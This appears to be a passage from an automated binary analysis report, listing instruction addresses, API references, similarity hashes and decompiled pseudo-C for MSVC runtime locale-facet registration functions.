                                                                                                0x00000000
                                                                                                0x00f8780f
                                                                                                0x00f877d6
                                                                                                0x00f877d6
                                                                                                0x00000000
                                                                                                0x00f877d6
                                                                                                0x00f877d4
                                                                                                0x00f87758
                                                                                                0x00f87758
                                                                                                0x00f8775b
                                                                                                0x00f8775f
                                                                                                0x00f87763
                                                                                                0x00f87770
                                                                                                0x00f87778
                                                                                                0x00f8777a
                                                                                                0x00000000
                                                                                                0x00f8777a
                                                                                                0x00f87741
                                                                                                0x00f87741
                                                                                                0x00000000
                                                                                                0x00f87741
                                                                                                0x00f8773f
                                                                                                0x00f876c3
                                                                                                0x00f876c3
                                                                                                0x00f876c6
                                                                                                0x00f876ca
                                                                                                0x00f876ce
                                                                                                0x00f876db
                                                                                                0x00f876e3
                                                                                                0x00f876e5
                                                                                                0x00000000
                                                                                                0x00f876e5
                                                                                                0x00f876ac
                                                                                                0x00f876ac
                                                                                                0x00000000
                                                                                                0x00f876ac
                                                                                                0x00f876aa
                                                                                                0x00f8762e
                                                                                                0x00f8762e
                                                                                                0x00f87631
                                                                                                0x00f87635
                                                                                                0x00f87639
                                                                                                0x00f87646
                                                                                                0x00f8764e
                                                                                                0x00f87650
                                                                                                0x00000000
                                                                                                0x00f87650
                                                                                                0x00f87617
                                                                                                0x00f87617
                                                                                                0x00000000
                                                                                                0x00f87617
                                                                                                0x00f87615
                                                                                                0x00f87599
                                                                                                0x00f87599
                                                                                                0x00f8759c
                                                                                                0x00f875a0
                                                                                                0x00f875a4
                                                                                                0x00f875b1
                                                                                                0x00f875b9
                                                                                                0x00f875bb
                                                                                                0x00000000
                                                                                                0x00f875bb
                                                                                                0x00f87582
                                                                                                0x00f87582
                                                                                                0x00000000
                                                                                                0x00f87582
                                                                                                0x00f87580
                                                                                                0x00f87504
                                                                                                0x00f87504
                                                                                                0x00f87507
                                                                                                0x00f8750b
                                                                                                0x00f8750f
                                                                                                0x00f8751c
                                                                                                0x00f87524
                                                                                                0x00f87526
                                                                                                0x00000000
                                                                                                0x00f87526
                                                                                                0x00f874ed
                                                                                                0x00f874ed
                                                                                                0x00000000
                                                                                                0x00f874ed
                                                                                                0x00f874eb
                                                                                                0x00f8746f
                                                                                                0x00f8746f
                                                                                                0x00f87472
                                                                                                0x00f87476
                                                                                                0x00f8747a
                                                                                                0x00f87487
                                                                                                0x00f8748f
                                                                                                0x00f87491
                                                                                                0x00000000
                                                                                                0x00f87491
                                                                                                0x00f87458
                                                                                                0x00f87458
                                                                                                0x00000000
                                                                                                0x00f87458
                                                                                                0x00f87456
                                                                                                0x00f873da
                                                                                                0x00f873da
                                                                                                0x00f873dd
                                                                                                0x00f873e1
                                                                                                0x00f873e5
                                                                                                0x00f873f2
                                                                                                0x00f873fa
                                                                                                0x00f873fc
                                                                                                0x00000000
                                                                                                0x00f873fc
                                                                                                0x00f873c3
                                                                                                0x00f873c3
                                                                                                0x00000000
                                                                                                0x00f873c3
                                                                                                0x00f873c1
                                                                                                0x00f87345
                                                                                                0x00f87345
                                                                                                0x00f87348
                                                                                                0x00f8734c
                                                                                                0x00f87350
                                                                                                0x00f8735d
                                                                                                0x00f87365
                                                                                                0x00f87367
                                                                                                0x00000000
                                                                                                0x00f87367
                                                                                                0x00f8732e
                                                                                                0x00f8732e
                                                                                                0x00000000
                                                                                                0x00f8732e
                                                                                                0x00f8732c
                                                                                                0x00f872b0
                                                                                                0x00f872b0
                                                                                                0x00f872b3
                                                                                                0x00f872b7
                                                                                                0x00f872bb
                                                                                                0x00f872c8
                                                                                                0x00f872d0
                                                                                                0x00f872d2
                                                                                                0x00000000
                                                                                                0x00f872d2
                                                                                                0x00f87299
                                                                                                0x00f87299
                                                                                                0x00000000
                                                                                                0x00f87299
                                                                                                0x00f87297

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00F87260
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F8726A
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::_Lockit.LIBCPMT ref: 00F78A00
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F78A28
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F872BB
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F872DB
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                • String ID:
                                                                                                • API String ID: 2854358121-0
                                                                                                • Opcode ID: 0764c2badc1da1ead6c9087768822d056a05f240775bd76860f6c5456175013e
                                                                                                • Instruction ID: 8ec0e95763b022aac8f2f3595bc9bc350c28d72050cb7cb9c256e267d1147f36
                                                                                                • Opcode Fuzzy Hash: 0764c2badc1da1ead6c9087768822d056a05f240775bd76860f6c5456175013e
                                                                                                • Instruction Fuzzy Hash: 2701A1369042199BCB04FB64CC457EE7761AF84760F64410AF401AB292DF38DE02FB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 72%
                                                                                                			E00F82200(void* __edi, void* __esi, void* __eflags) {
                                                                                                				intOrPtr* _t32;
                                                                                                				void* _t48;
                                                                                                				void* _t49;
                                                                                                				intOrPtr* _t72;
                                                                                                				intOrPtr* _t73;
                                                                                                				intOrPtr* _t82;
                                                                                                				intOrPtr* _t84;
                                                                                                				intOrPtr* _t85;
                                                                                                				void* _t90;
                                                                                                
                                                                                                				_push(8);
                                                                                                				E00FB38B2(0xfb6ebe, __edi, __esi);
                                                                                                				E00F856E6(_t90 - 0x14, 0);
                                                                                                				_t84 =  *0xfd0948; // 0x0
                                                                                                				 *(_t90 - 4) =  *(_t90 - 4) & 0x00000000;
                                                                                                				 *((intOrPtr*)(_t90 - 0x10)) = _t84;
                                                                                                				_t32 = E00F78A40( *((intOrPtr*)(_t90 + 8)), E00F789D0());
                                                                                                				_t81 = _t32;
                                                                                                				if(_t32 != 0) {
                                                                                                					L5:
                                                                                                					E00F8573E(_t90 - 0x14);
                                                                                                					return E00FB388C(_t81);
                                                                                                				} else {
                                                                                                					if(_t84 == 0) {
                                                                                                						_push( *((intOrPtr*)(_t90 + 8)));
                                                                                                						_push(_t90 - 0x10);
                                                                                                						__eflags = E00F8285B(_t81, _t84, __eflags) - 0xffffffff;
                                                                                                						if(__eflags == 0) {
                                                                                                							E00F78FE0(__eflags);
                                                                                                							asm("int3");
                                                                                                							_push(8);
                                                                                                							E00FB38B2(0xfb6ebe, _t81, _t84);
                                                                                                							E00F856E6(_t90 - 0x14, 0);
                                                                                                							_t85 =  *0xfd094c; // 0x0
                                                                                                							 *(_t90 - 4) =  *(_t90 - 4) & 0x00000000;
                                                                                                							 *((intOrPtr*)(_t90 - 0x10)) = _t85;
                                                                                                							_t82 = E00F78A40( *((intOrPtr*)(_t90 + 8)), E00F789D0());
                                                                                                							__eflags = _t82;
                                                                                                							if(_t82 != 0) {
                                                                                                								L12:
                                                                                                								E00F8573E(_t90 - 0x14);
                                                                                                								return E00FB388C(_t82);
                                                                                                							} else {
                                                                                                								__eflags = _t85;
                                                                                                								if(__eflags == 0) {
                                                                                                									_push( *((intOrPtr*)(_t90 + 8)));
                                                                                                									_push(_t90 - 0x10);
                                                                                                									_t48 = E00F828C3(_t82, _t85, __eflags);
                                                                                                									_pop(_t72);
                                                                                                									__eflags = _t48 - 0xffffffff;
                                                                                                									if(__eflags == 0) {
                                                                                                										_t49 = E00F78FE0(__eflags);
                                                                                                										asm("int3");
                                                                                                										_t73 =  *_t72;
                                                                                                										__eflags = _t73;
                                                                                                										if(_t73 != 0) {
                                                                                                											_push(_t85);
                                                                                                											_t86 = _t73;
                                                                                                											E00F9BD1B( *((intOrPtr*)(_t73 + 8)));
                                                                                                											E00F9BD1B( *((intOrPtr*)(_t73 + 0x10)));
                                                                                                											return E00F9BD1B( *((intOrPtr*)(_t86 + 0x14)));
                                                                                                										} else {
                                                                                                											return _t49;
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t82 =  *((intOrPtr*)(_t90 - 0x10));
                                                                                                										 *((intOrPtr*)(_t90 - 0x10)) = _t82;
                                                                                                										 *(_t90 - 4) = 1;
                                                                                                										E00F85472(_t82);
                                                                                                										 *0xfb81fc();
                                                                                                										 *((intOrPtr*)( *((intOrPtr*)( *_t82 + 4))))();
                                                                                                										 *0xfd094c = _t82;
                                                                                                										goto L12;
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t82 = _t85;
                                                                                                									goto L12;
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t81 =  *((intOrPtr*)(_t90 - 0x10));
                                                                                                							 *((intOrPtr*)(_t90 - 0x10)) = _t81;
                                                                                                							 *(_t90 - 4) = 1;
                                                                                                							E00F85472(_t81);
                                                                                                							 *0xfb81fc();
                                                                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t81 + 4))))();
                                                                                                							 *0xfd0948 = _t81;
                                                                                                							goto L5;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t81 = _t84;
                                                                                                						goto L5;
                                                                                                					}
                                                                                                				}
                                                                                                			}












                                                                                                0x00f82200
                                                                                                0x00f82207
                                                                                                0x00f82211
                                                                                                0x00f82216
                                                                                                0x00f82221
                                                                                                0x00f82225
                                                                                                0x00f82231
                                                                                                0x00f82236
                                                                                                0x00f8223a
                                                                                                0x00f8227f
                                                                                                0x00f82282
                                                                                                0x00f8228e
                                                                                                0x00f8223c
                                                                                                0x00f8223e
                                                                                                0x00f82244
                                                                                                0x00f8224a
                                                                                                0x00f82252
                                                                                                0x00f82255
                                                                                                0x00f8228f
                                                                                                0x00f82294
                                                                                                0x00f82295
                                                                                                0x00f8229c
                                                                                                0x00f822a6
                                                                                                0x00f822ab
                                                                                                0x00f822b6
                                                                                                0x00f822ba
                                                                                                0x00f822cb
                                                                                                0x00f822cd
                                                                                                0x00f822cf
                                                                                                0x00f82314
                                                                                                0x00f82317
                                                                                                0x00f82323
                                                                                                0x00f822d1
                                                                                                0x00f822d1
                                                                                                0x00f822d3
                                                                                                0x00f822d9
                                                                                                0x00f822df
                                                                                                0x00f822e0
                                                                                                0x00f822e6
                                                                                                0x00f822e7
                                                                                                0x00f822ea
                                                                                                0x00f82324
                                                                                                0x00f82329
                                                                                                0x00f8232a
                                                                                                0x00f8232c
                                                                                                0x00f8232e
                                                                                                0x00f8420b
                                                                                                0x00f8420c
                                                                                                0x00f84211
                                                                                                0x00f84219
                                                                                                0x00f8422a
                                                                                                0x00f82334
                                                                                                0x00f82334
                                                                                                0x00f82334
                                                                                                0x00f822ec
                                                                                                0x00f822ec
                                                                                                0x00f822ef
                                                                                                0x00f822f3
                                                                                                0x00f822f7
                                                                                                0x00f82304
                                                                                                0x00f8230c
                                                                                                0x00f8230e
                                                                                                0x00000000
                                                                                                0x00f8230e
                                                                                                0x00f822d5
                                                                                                0x00f822d5
                                                                                                0x00000000
                                                                                                0x00f822d5
                                                                                                0x00f822d3
                                                                                                0x00f82257
                                                                                                0x00f82257
                                                                                                0x00f8225a
                                                                                                0x00f8225e
                                                                                                0x00f82262
                                                                                                0x00f8226f
                                                                                                0x00f82277
                                                                                                0x00f82279
                                                                                                0x00000000
                                                                                                0x00f82279
                                                                                                0x00f82240
                                                                                                0x00f82240
                                                                                                0x00000000
                                                                                                0x00f82240
                                                                                                0x00f8223e

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00F82207
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F82211
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::_Lockit.LIBCPMT ref: 00F78A00
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F78A28
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F82262
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F82282
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                • String ID:
                                                                                                • API String ID: 2854358121-0
                                                                                                • Opcode ID: 584a1047fa60e400e1257938764e646e904d98a457970d142d09c8cea40bc6a9
                                                                                                • Instruction ID: 119d263bec9d63a6494c198efeabb22d7f433a0667d936d840502a101748ddb3
                                                                                                • Opcode Fuzzy Hash: 584a1047fa60e400e1257938764e646e904d98a457970d142d09c8cea40bc6a9
                                                                                                • Instruction Fuzzy Hash: CE01A1359001299BDB44FB64CC556FE7761AF94760F24401AE40567392DF38EE02EB82
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 71%
                                                                                                			E00F913F0(void* __edi, void* __esi, void* __eflags) {
                                                                                                				signed int _t83;
                                                                                                				void* _t143;
                                                                                                				signed int _t210;
                                                                                                				signed int _t231;
                                                                                                				signed int _t232;
                                                                                                				signed int _t233;
                                                                                                				signed int _t234;
                                                                                                				signed int _t235;
                                                                                                				signed int _t237;
                                                                                                				signed int _t238;
                                                                                                				signed int _t239;
                                                                                                				signed int _t240;
                                                                                                				signed int _t241;
                                                                                                				signed int _t242;
                                                                                                				signed int _t243;
                                                                                                				void* _t250;
                                                                                                
                                                                                                				_push(8);
                                                                                                				E00FB38B2(0xfb6ebe, __edi, __esi);
                                                                                                				E00F856E6(_t250 - 0x14, 0);
                                                                                                				_t237 =  *0xfd0b4c; // 0x0
                                                                                                				 *(_t250 - 4) =  *(_t250 - 4) & 0x00000000;
                                                                                                				 *(_t250 - 0x10) = _t237;
                                                                                                				_t83 = E00F78A40( *((intOrPtr*)(_t250 + 8)), E00F789D0());
                                                                                                				_t230 = _t83;
                                                                                                				if(_t83 != 0) {
                                                                                                					L5:
                                                                                                					E00F8573E(_t250 - 0x14);
                                                                                                					return E00FB388C(_t230);
                                                                                                				} else {
                                                                                                					if(_t237 == 0) {
                                                                                                						_push( *((intOrPtr*)(_t250 + 8)));
                                                                                                						_push(_t250 - 0x10);
                                                                                                						__eflags = E00F9197F(_t230, _t237, __eflags) - 0xffffffff;
                                                                                                						if(__eflags == 0) {
                                                                                                							E00F78FE0(__eflags);
                                                                                                							asm("int3");
                                                                                                							_push(8);
                                                                                                							E00FB38B2(0xfb6ebe, _t230, _t237);
                                                                                                							E00F856E6(_t250 - 0x14, 0);
                                                                                                							_t238 =  *0xfd0b50; // 0x0
                                                                                                							 *(_t250 - 4) =  *(_t250 - 4) & 0x00000000;
                                                                                                							 *(_t250 - 0x10) = _t238;
                                                                                                							_t231 = E00F78A40( *((intOrPtr*)(_t250 + 8)), E00F789D0());
                                                                                                							__eflags = _t231;
                                                                                                							if(_t231 != 0) {
                                                                                                								L12:
                                                                                                								E00F8573E(_t250 - 0x14);
                                                                                                								return E00FB388C(_t231);
                                                                                                							} else {
                                                                                                								__eflags = _t238;
                                                                                                								if(__eflags == 0) {
                                                                                                									_push( *((intOrPtr*)(_t250 + 8)));
                                                                                                									_push(_t250 - 0x10);
                                                                                                									__eflags = E00F919E7(_t231, _t238, __eflags) - 0xffffffff;
                                                                                                									if(__eflags == 0) {
                                                                                                										E00F78FE0(__eflags);
                                                                                                										asm("int3");
                                                                                                										_push(8);
                                                                                                										E00FB38B2(0xfb6ebe, _t231, _t238);
                                                                                                										E00F856E6(_t250 - 0x14, 0);
                                                                                                										_t239 =  *0xfd0b58; // 0x0
                                                                                                										 *(_t250 - 4) =  *(_t250 - 4) & 0x00000000;
                                                                                                										 *(_t250 - 0x10) = _t239;
                                                                                                										_t232 = E00F78A40( *((intOrPtr*)(_t250 + 8)), E00F789D0());
                                                                                                										__eflags = _t232;
                                                                                                										if(_t232 != 0) {
                                                                                                											L19:
                                                                                                											E00F8573E(_t250 - 0x14);
                                                                                                											return E00FB388C(_t232);
                                                                                                										} else {
                                                                                                											__eflags = _t239;
                                                                                                											if(__eflags == 0) {
                                                                                                												_push( *((intOrPtr*)(_t250 + 8)));
                                                                                                												_push(_t250 - 0x10);
                                                                                                												__eflags = E00F91A4F(_t232, _t239, __eflags) - 0xffffffff;
                                                                                                												if(__eflags == 0) {
                                                                                                													E00F78FE0(__eflags);
                                                                                                													asm("int3");
                                                                                                													_push(8);
                                                                                                													E00FB38B2(0xfb6ebe, _t232, _t239);
                                                                                                													E00F856E6(_t250 - 0x14, 0);
                                                                                                													_t240 =  *0xfd0b54; // 0x0
                                                                                                													 *(_t250 - 4) =  *(_t250 - 4) & 0x00000000;
                                                                                                													 *(_t250 - 0x10) = _t240;
                                                                                                													_t233 = E00F78A40( *((intOrPtr*)(_t250 + 8)), E00F789D0());
                                                                                                													__eflags = _t233;
                                                                                                													if(_t233 != 0) {
                                                                                                														L26:
                                                                                                														E00F8573E(_t250 - 0x14);
                                                                                                														return E00FB388C(_t233);
                                                                                                													} else {
                                                                                                														__eflags = _t240;
                                                                                                														if(__eflags == 0) {
                                                                                                															_push( *((intOrPtr*)(_t250 + 8)));
                                                                                                															_push(_t250 - 0x10);
                                                                                                															__eflags = E00F91AD3(_t233, _t240, __eflags) - 0xffffffff;
                                                                                                															if(__eflags == 0) {
                                                                                                																E00F78FE0(__eflags);
                                                                                                																asm("int3");
                                                                                                																_push(8);
                                                                                                																E00FB38B2(0xfb6ebe, _t233, _t240);
                                                                                                																E00F856E6(_t250 - 0x14, 0);
                                                                                                																_t241 =  *0xfd0b5c; // 0x0
                                                                                                																 *(_t250 - 4) =  *(_t250 - 4) & 0x00000000;
                                                                                                																 *(_t250 - 0x10) = _t241;
                                                                                                																_t234 = E00F78A40( *((intOrPtr*)(_t250 + 8)), E00F789D0());
                                                                                                																__eflags = _t234;
                                                                                                																if(_t234 != 0) {
                                                                                                																	L33:
                                                                                                																	E00F8573E(_t250 - 0x14);
                                                                                                																	return E00FB388C(_t234);
                                                                                                																} else {
                                                                                                																	__eflags = _t241;
                                                                                                																	if(__eflags == 0) {
                                                                                                																		_push( *((intOrPtr*)(_t250 + 8)));
                                                                                                																		_push(_t250 - 0x10);
                                                                                                																		__eflags = E00F91B58(_t234, _t241, __eflags) - 0xffffffff;
                                                                                                																		if(__eflags == 0) {
                                                                                                																			E00F78FE0(__eflags);
                                                                                                																			asm("int3");
                                                                                                																			_push(8);
                                                                                                																			E00FB38B2(0xfb6ebe, _t234, _t241);
                                                                                                																			E00F856E6(_t250 - 0x14, 0);
                                                                                                																			_t242 =  *0xfd0b60; // 0x0
                                                                                                																			 *(_t250 - 4) =  *(_t250 - 4) & 0x00000000;
                                                                                                																			 *(_t250 - 0x10) = _t242;
                                                                                                																			_t235 = E00F78A40( *((intOrPtr*)(_t250 + 8)), E00F789D0());
                                                                                                																			__eflags = _t235;
                                                                                                																			if(_t235 != 0) {
                                                                                                																				L40:
                                                                                                																				E00F8573E(_t250 - 0x14);
                                                                                                																				return E00FB388C(_t235);
                                                                                                																			} else {
                                                                                                																				__eflags = _t242;
                                                                                                																				if(__eflags == 0) {
                                                                                                																					_push( *((intOrPtr*)(_t250 + 8)));
                                                                                                																					_push(_t250 - 0x10);
                                                                                                																					_t143 = E00F91BC4(_t235, _t242, __eflags);
                                                                                                																					_pop(_t210);
                                                                                                																					__eflags = _t143 - 0xffffffff;
                                                                                                																					if(__eflags == 0) {
                                                                                                																						E00F78FE0(__eflags);
                                                                                                																						asm("int3");
                                                                                                																						_push(4);
                                                                                                																						E00FB38B2(0xfb7295, _t235, _t242);
                                                                                                																						_t243 = _t210;
                                                                                                																						 *(_t250 - 0x10) = _t243;
                                                                                                																						 *((intOrPtr*)(_t243 + 4)) =  *((intOrPtr*)(_t250 + 0xc));
                                                                                                																						_push( *((intOrPtr*)(_t250 + 8)));
                                                                                                																						_t77 = _t250 - 4;
                                                                                                																						 *_t77 =  *(_t250 - 4) & 0x00000000;
                                                                                                																						__eflags =  *_t77;
                                                                                                																						 *_t243 = 0xfb9ac0;
                                                                                                																						E00F929F5(_t210, _t235, _t243,  *_t77);
                                                                                                																						return E00FB388C(_t243);
                                                                                                																					} else {
                                                                                                																						_t235 =  *(_t250 - 0x10);
                                                                                                																						 *(_t250 - 0x10) = _t235;
                                                                                                																						 *(_t250 - 4) = 1;
                                                                                                																						E00F85472(_t235);
                                                                                                																						 *0xfb81fc();
                                                                                                																						 *((intOrPtr*)( *((intOrPtr*)( *_t235 + 4))))();
                                                                                                																						 *0xfd0b60 = _t235;
                                                                                                																						goto L40;
                                                                                                																					}
                                                                                                																				} else {
                                                                                                																					_t235 = _t242;
                                                                                                																					goto L40;
                                                                                                																				}
                                                                                                																			}
                                                                                                																		} else {
                                                                                                																			_t234 =  *(_t250 - 0x10);
                                                                                                																			 *(_t250 - 0x10) = _t234;
                                                                                                																			 *(_t250 - 4) = 1;
                                                                                                																			E00F85472(_t234);
                                                                                                																			 *0xfb81fc();
                                                                                                																			 *((intOrPtr*)( *((intOrPtr*)( *_t234 + 4))))();
                                                                                                																			 *0xfd0b5c = _t234;
                                                                                                																			goto L33;
                                                                                                																		}
                                                                                                																	} else {
                                                                                                																		_t234 = _t241;
                                                                                                																		goto L33;
                                                                                                																	}
                                                                                                																}
                                                                                                															} else {
                                                                                                																_t233 =  *(_t250 - 0x10);
                                                                                                																 *(_t250 - 0x10) = _t233;
                                                                                                																 *(_t250 - 4) = 1;
                                                                                                																E00F85472(_t233);
                                                                                                																 *0xfb81fc();
                                                                                                																 *((intOrPtr*)( *((intOrPtr*)( *_t233 + 4))))();
                                                                                                																 *0xfd0b54 = _t233;
                                                                                                																goto L26;
                                                                                                															}
                                                                                                														} else {
                                                                                                															_t233 = _t240;
                                                                                                															goto L26;
                                                                                                														}
                                                                                                													}
                                                                                                												} else {
                                                                                                													_t232 =  *(_t250 - 0x10);
                                                                                                													 *(_t250 - 0x10) = _t232;
                                                                                                													 *(_t250 - 4) = 1;
                                                                                                													E00F85472(_t232);
                                                                                                													 *0xfb81fc();
                                                                                                													 *((intOrPtr*)( *((intOrPtr*)( *_t232 + 4))))();
                                                                                                													 *0xfd0b58 = _t232;
                                                                                                													goto L19;
                                                                                                												}
                                                                                                											} else {
                                                                                                												_t232 = _t239;
                                                                                                												goto L19;
                                                                                                											}
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t231 =  *(_t250 - 0x10);
                                                                                                										 *(_t250 - 0x10) = _t231;
                                                                                                										 *(_t250 - 4) = 1;
                                                                                                										E00F85472(_t231);
                                                                                                										 *0xfb81fc();
                                                                                                										 *((intOrPtr*)( *((intOrPtr*)( *_t231 + 4))))();
                                                                                                										 *0xfd0b50 = _t231;
                                                                                                										goto L12;
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t231 = _t238;
                                                                                                									goto L12;
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t230 =  *(_t250 - 0x10);
                                                                                                							 *(_t250 - 0x10) = _t230;
                                                                                                							 *(_t250 - 4) = 1;
                                                                                                							E00F85472(_t230);
                                                                                                							 *0xfb81fc();
                                                                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t230 + 4))))();
                                                                                                							 *0xfd0b4c = _t230;
                                                                                                							goto L5;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t230 = _t237;
                                                                                                						goto L5;
                                                                                                					}
                                                                                                				}
                                                                                                			}



















                                                                                                0x00f913f0
                                                                                                0x00f913f7
                                                                                                0x00f91401
                                                                                                0x00f91406
                                                                                                0x00f91411
                                                                                                0x00f91415
                                                                                                0x00f91421
                                                                                                0x00f91426
                                                                                                0x00f9142a
                                                                                                0x00f9146f
                                                                                                0x00f91472
                                                                                                0x00f9147e
                                                                                                0x00f9142c
                                                                                                0x00f9142e
                                                                                                0x00f91434
                                                                                                0x00f9143a
                                                                                                0x00f91442
                                                                                                0x00f91445
                                                                                                0x00f9147f
                                                                                                0x00f91484
                                                                                                0x00f91485
                                                                                                0x00f9148c
                                                                                                0x00f91496
                                                                                                0x00f9149b
                                                                                                0x00f914a6
                                                                                                0x00f914aa
                                                                                                0x00f914bb
                                                                                                0x00f914bd
                                                                                                0x00f914bf
                                                                                                0x00f91504
                                                                                                0x00f91507
                                                                                                0x00f91513
                                                                                                0x00f914c1
                                                                                                0x00f914c1
                                                                                                0x00f914c3
                                                                                                0x00f914c9
                                                                                                0x00f914cf
                                                                                                0x00f914d7
                                                                                                0x00f914da
                                                                                                0x00f91514
                                                                                                0x00f91519
                                                                                                0x00f9151a
                                                                                                0x00f91521
                                                                                                0x00f9152b
                                                                                                0x00f91530
                                                                                                0x00f9153b
                                                                                                0x00f9153f
                                                                                                0x00f91550
                                                                                                0x00f91552
                                                                                                0x00f91554
                                                                                                0x00f91599
                                                                                                0x00f9159c
                                                                                                0x00f915a8
                                                                                                0x00f91556
                                                                                                0x00f91556
                                                                                                0x00f91558
                                                                                                0x00f9155e
                                                                                                0x00f91564
                                                                                                0x00f9156c
                                                                                                0x00f9156f
                                                                                                0x00f915a9
                                                                                                0x00f915ae
                                                                                                0x00f915af
                                                                                                0x00f915b6
                                                                                                0x00f915c0
                                                                                                0x00f915c5
                                                                                                0x00f915d0
                                                                                                0x00f915d4
                                                                                                0x00f915e5
                                                                                                0x00f915e7
                                                                                                0x00f915e9
                                                                                                0x00f9162e
                                                                                                0x00f91631
                                                                                                0x00f9163d
                                                                                                0x00f915eb
                                                                                                0x00f915eb
                                                                                                0x00f915ed
                                                                                                0x00f915f3
                                                                                                0x00f915f9
                                                                                                0x00f91601
                                                                                                0x00f91604
                                                                                                0x00f9163e
                                                                                                0x00f91643
                                                                                                0x00f91644
                                                                                                0x00f9164b
                                                                                                0x00f91655
                                                                                                0x00f9165a
                                                                                                0x00f91665
                                                                                                0x00f91669
                                                                                                0x00f9167a
                                                                                                0x00f9167c
                                                                                                0x00f9167e
                                                                                                0x00f916c3
                                                                                                0x00f916c6
                                                                                                0x00f916d2
                                                                                                0x00f91680
                                                                                                0x00f91680
                                                                                                0x00f91682
                                                                                                0x00f91688
                                                                                                0x00f9168e
                                                                                                0x00f91696
                                                                                                0x00f91699
                                                                                                0x00f916d3
                                                                                                0x00f916d8
                                                                                                0x00f916d9
                                                                                                0x00f916e0
                                                                                                0x00f916ea
                                                                                                0x00f916ef
                                                                                                0x00f916fa
                                                                                                0x00f916fe
                                                                                                0x00f9170f
                                                                                                0x00f91711
                                                                                                0x00f91713
                                                                                                0x00f91758
                                                                                                0x00f9175b
                                                                                                0x00f91767
                                                                                                0x00f91715
                                                                                                0x00f91715
                                                                                                0x00f91717
                                                                                                0x00f9171d
                                                                                                0x00f91723
                                                                                                0x00f91724
                                                                                                0x00f9172a
                                                                                                0x00f9172b
                                                                                                0x00f9172e
                                                                                                0x00f91768
                                                                                                0x00f9176d
                                                                                                0x00f9176e
                                                                                                0x00f91775
                                                                                                0x00f9177a
                                                                                                0x00f9177c
                                                                                                0x00f91782
                                                                                                0x00f91785
                                                                                                0x00f91788
                                                                                                0x00f91788
                                                                                                0x00f91788
                                                                                                0x00f9178c
                                                                                                0x00f91792
                                                                                                0x00f9179e
                                                                                                0x00f91730
                                                                                                0x00f91730
                                                                                                0x00f91733
                                                                                                0x00f91737
                                                                                                0x00f9173b
                                                                                                0x00f91748
                                                                                                0x00f91750
                                                                                                0x00f91752
                                                                                                0x00000000
                                                                                                0x00f91752
                                                                                                0x00f91719
                                                                                                0x00f91719
                                                                                                0x00000000
                                                                                                0x00f91719
                                                                                                0x00f91717
                                                                                                0x00f9169b
                                                                                                0x00f9169b
                                                                                                0x00f9169e
                                                                                                0x00f916a2
                                                                                                0x00f916a6
                                                                                                0x00f916b3
                                                                                                0x00f916bb
                                                                                                0x00f916bd
                                                                                                0x00000000
                                                                                                0x00f916bd
                                                                                                0x00f91684
                                                                                                0x00f91684
                                                                                                0x00000000
                                                                                                0x00f91684
                                                                                                0x00f91682
                                                                                                0x00f91606
                                                                                                0x00f91606
                                                                                                0x00f91609
                                                                                                0x00f9160d
                                                                                                0x00f91611
                                                                                                0x00f9161e
                                                                                                0x00f91626
                                                                                                0x00f91628
                                                                                                0x00000000
                                                                                                0x00f91628
                                                                                                0x00f915ef
                                                                                                0x00f915ef
                                                                                                0x00000000
                                                                                                0x00f915ef
                                                                                                0x00f915ed
                                                                                                0x00f91571
                                                                                                0x00f91571
                                                                                                0x00f91574
                                                                                                0x00f91578
                                                                                                0x00f9157c
                                                                                                0x00f91589
                                                                                                0x00f91591
                                                                                                0x00f91593
                                                                                                0x00000000
                                                                                                0x00f91593
                                                                                                0x00f9155a
                                                                                                0x00f9155a
                                                                                                0x00000000
                                                                                                0x00f9155a
                                                                                                0x00f91558
                                                                                                0x00f914dc
                                                                                                0x00f914dc
                                                                                                0x00f914df
                                                                                                0x00f914e3
                                                                                                0x00f914e7
                                                                                                0x00f914f4
                                                                                                0x00f914fc
